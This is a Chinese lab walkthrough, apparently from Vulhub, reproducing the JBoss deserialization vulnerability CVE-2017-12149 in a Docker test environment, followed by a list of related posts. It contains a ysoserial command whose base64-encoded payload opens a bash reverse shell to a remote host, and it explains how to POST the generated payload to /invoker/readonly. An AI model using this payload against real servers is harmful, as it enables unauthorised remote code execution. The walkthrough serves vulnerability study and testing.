jboss 5.x/6.x 反序列化漏洞 cve-2017-12149
目录
测试环境
漏洞复现
编写反弹shell的命令
序列化数据生成
发送POC
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
参考:
- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
- https://access.redhat.com/security/cve/cve-2017-12149
测试环境
运行测试环境
docker-compose up -d
首次执行时会有1~3分钟时间初始化,初始化完成后访问http://your-ip:8080/
即可看到JBoss默认页面。
漏洞复现
该漏洞出现在/invoker/readonly
请求中,服务器将用户提交的POST内容进行了Java反序列化:
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。
编写反弹shell的命令
我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()
中不能使用管道符等bash需要的方法,我们需要用进行一次编码。
工具:http://www.jackson-t.ca/runtime-exec-payloads.html
序列化数据生成
使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
发送POC
生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
成功反弹shell:
jboss 5.x/6.x 反序列化漏洞 cve-2017-12149相关推荐
- 反序列化工具_JBOSS反序列化漏洞
10月13日 简简单单的复现一个漏洞0x00 起因 因为当初说要把vulhub上面的漏洞都复现一遍,然后今天看内网的书又头疼,python也学不下去,打开vulhub,然后随便一滚鼠标滑轮,刚刚好遇见 ...
- 深入理解JNDI注入与Java反序列化漏洞利用
rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的 ...
- JBoss 4.x 5.x 6.xJBossMQ JMS 反序列化漏洞
文章目录 Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504 基础知识 漏洞原理 影响版本 复现思路 复现-CVE-2017-12149 1.特征检测 2.反弹shel ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- JBoss 反序列化漏洞复现
JBoss 反序列化漏洞复现 漏洞描述: 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主 ...
- 【技术推荐】WebLogic 反序列化漏洞深入分析
前言 Oracle 官方 2021 年 10 月份发布的安全更新通告中披露了 WebLogic 组件存在高危漏洞,攻击者可以在未授权的情况下通过 IIOP.T3 协议对存在漏洞的 WebLogic S ...
- 网络安全【漏洞安全】反序列化漏洞深入分析
前言 本文将介绍下如何 diff WebLogic 的补丁,以及在跟踪补丁的过程中对可能存在的一种绕过黑名单的反序列化手法的介绍. T3 和 IIOP 以下漏洞均基于 T3 和 IIOP 作为入口触发 ...
- Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551的漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低.影响范围为10.3.6.0.0, 12.1. ...
最新文章
- 关于C#值类型,引用类型,值传递,引用传递
- mybatis generator 中文注释_mybatis代码生成器,提高开发效率
- 【物联网工厂大揭秘】电路板、数传模块 是怎么生产制造出来的?
- Markdown--编辑表格与矩阵
- 使用盒子模型仿照优酷的页面片段
- 移动端机器学习模型压缩也自动化了:腾讯新框架为自家模型加速50%
- java.lang.NoClassDefFoundError 怎么解决
- 简述旋转编码器的工作原理_绝对值编码器工作原理以及故障处理方法有哪些?...
- php SNMP函数时出错
- html图片表情怎么搞,学习使用HTML5/CSS3来制作简单的表情动画
- 国产免费虚拟化OVM与 OpenStack对比
- 关于IE读取缓存页面不刷新解决方法
- 无锡梅里旅游策划方案——中国第一锡宫!
- 知道这些网站,能让你的工作效率提高2000%!
- Ubuntu系统上编译和安装perl和cpan模块
- 安装arcgis10.2和arcgis server
- 50岁学计算机后往哪方面发展,50岁的人,学点什么技术可为以后养老打点基础?看完明白了...
- 开机密码锁定计算机,win10设置开机密码输入错误锁定电脑的方法
- 河南对口计算机本科学校有哪些,河南计算机对口升学有哪些学校
- javascript 回顾一下 基础标准内置对象 Object(二)